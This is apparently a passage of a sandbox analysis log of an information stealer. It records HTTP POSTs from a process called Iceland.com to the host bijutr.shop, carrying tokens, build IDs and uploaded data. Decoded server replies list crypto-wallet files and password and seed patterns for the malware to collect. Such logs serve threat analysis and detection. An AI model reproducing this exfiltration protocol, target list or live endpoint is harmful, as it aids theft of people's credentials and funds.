                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              22192.168.2.449802188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:12 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----5XT00ZUAAI5FU3WLXTR9
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 35 58 54 30 30 5a 55 41 41 49 35 46 55 33 57 4c 58 54 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 35 58 54 30 30 5a 55 41 41 49 35 46 55 33 57 4c 58 54 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 35 58 54 30 30 5a 55 41 41 49 35 46 55 33 57 4c 58 54 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------5XT00ZUAAI5FU3WLXTR9Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------5XT00ZUAAI5FU3WLXTR9Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------5XT00ZUAAI5FU3WLXTR9Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:13 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              23192.168.2.449808188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:15 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------UAS0ZU3EUA1NYMY58GLXCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:15 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                              Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              24192.168.2.449838188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:28 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----DBA1DBSRQQ9ZUASRIWLF
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 32481
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 31 44 42 53 52 51 51 39 5a 55 41 53 52 49 57 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 31 44 42 53 52 51 51 39 5a 55 41 53 52 49 57 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 31 44 42 53 52 51 51 39 5a 55 41 53 52 49 57 4c 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------DBA1DBSRQQ9ZUASRIWLFContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------DBA1DBSRQQ9ZUASRIWLFContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------DBA1DBSRQQ9ZUASRIWLFCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:28 UTC16126OUTData Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              25192.168.2.449840188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:29 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HVKX4WTJM7G4E3W47YUS
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 4421
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:29 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 48 56 4b 58 34 57 54 4a 4d 37 47 34 45 33 57 34 37 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 48 56 4b 58 34 57 54 4a 4d 37 47 34 45 33 57 34 37 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 48 56 4b 58 34 57 54 4a 4d 37 47 34 45 33 57 34 37 59 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------HVKX4WTJM7G4E3W47YUSContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------HVKX4WTJM7G4E3W47YUSContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------HVKX4WTJM7G4E3W47YUSCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              26192.168.2.449846188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:31 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KXB1DTJ58Q9RQQQIWL6F
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 2449
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:31 UTC2449OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 54 4a 35 38 51 39 52 51 51 51 49 57 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 54 4a 35 38 51 39 52 51 51 51 49 57 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 54 4a 35 38 51 39 52 51 51 51 49 57 4c 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------KXB1DTJ58Q9RQQQIWL6FContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------KXB1DTJ58Q9RQQQIWL6FContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------KXB1DTJ58Q9RQQQIWL6FCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              27192.168.2.449849188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:32 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KXB1DTJ58Q9RQQQIWL6F
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 6533
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:32 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 54 4a 35 38 51 39 52 51 51 51 49 57 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 54 4a 35 38 51 39 52 51 51 51 49 57 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 54 4a 35 38 51 39 52 51 51 51 49 57 4c 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------KXB1DTJ58Q9RQQQIWL6FContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------KXB1DTJ58Q9RQQQIWL6FContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------KXB1DTJ58Q9RQQQIWL6FCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:33 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              28192.168.2.449853188.245.216.205443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:34 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 3269
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
